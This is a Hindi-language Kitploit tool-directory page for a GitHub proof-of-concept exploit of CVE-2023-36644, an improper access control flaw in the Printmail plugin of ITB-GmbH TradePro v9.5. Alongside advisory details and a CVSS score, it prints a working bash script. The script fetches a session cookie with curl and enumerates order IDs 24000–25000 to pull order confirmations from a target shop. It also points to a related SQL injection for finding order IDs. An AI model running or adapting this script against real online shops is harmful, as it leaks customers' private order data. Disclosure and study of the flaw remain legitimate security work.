Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-36644 — # CVE-2023-36644 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट ITB-GmbH TradePro v9.5 Printmail प्लगइन में गलत एक्सेस कंट्रोल के माध्यम से रिमोट सूचना प्रकटीकरण (remote information disclosure) प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें ऑर्डर पुष्टिकरण गणना (order confirmation enumeration) के लिए एक bash स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/caffeinated-labs/cve-2023-36644
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

वेबसाइट
62 साल पहलेअभी तक समीक्षित नहीं

# CVE-2023-36644 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट ITB-GmbH TradePro v9.5 Printmail प्लगइन में गलत एक्सेस कंट्रोल के माध्यम से रिमोट सूचना प्रकटीकरण (remote information disclosure) प्रदर्शित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। इसमें ऑर्डर पुष्टिकरण गणना (order confirmation enumeration) के लिए एक bash स्क्रिप्ट शामिल है।

साझा करें

== प्रभावित सॉफ्टवेयर [%hardbreaks] विक्रेता: ITB-GmbH प्रभावित उत्पाद: TradePro (v9.5) घटक: Printmail Plugin पुष्टि: हाँ

== हमला वेक्टर [%hardbreaks] प्रकार: गलत एक्सेस नियंत्रण एक्सेस-प्रकार: रिमोट प्रभाव: सूचना प्रकटीकरण

printmail प्लगइन में गलत एक्सेस नियंत्रण ITB-GmbH TradePro v9.5 को रिमोट हमलावरों को किसी http(s) एंडपॉइंट पर मनमाना ऑर्डर नंबर पास करके ऑनलाइन शॉप से सभी ऑर्डर पुष्टिकरण प्राप्त करने की अनुमति देता है।

== विवरण orderid पहले से ज्ञात होना चाहिए, लेकिन इसे आसानी से या SQLi का उपयोग करके गणना किया जा सकता है (रिपोर्ट देखें link:/security/CVE-2023-36645[CVE-2023-36645])

एक मान्य लेकिन अप्रमाणित सत्र कुकी के साथ http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] को कॉल करने से हमलावर को सभी ऑर्डर पुष्टिकरणों तक पहुंच मिल जाती है।

== CVSS [%hardbreaks] स्कोर: 7.1 वेक्टर: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== श्रेय

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
टूल डाउनलोड करें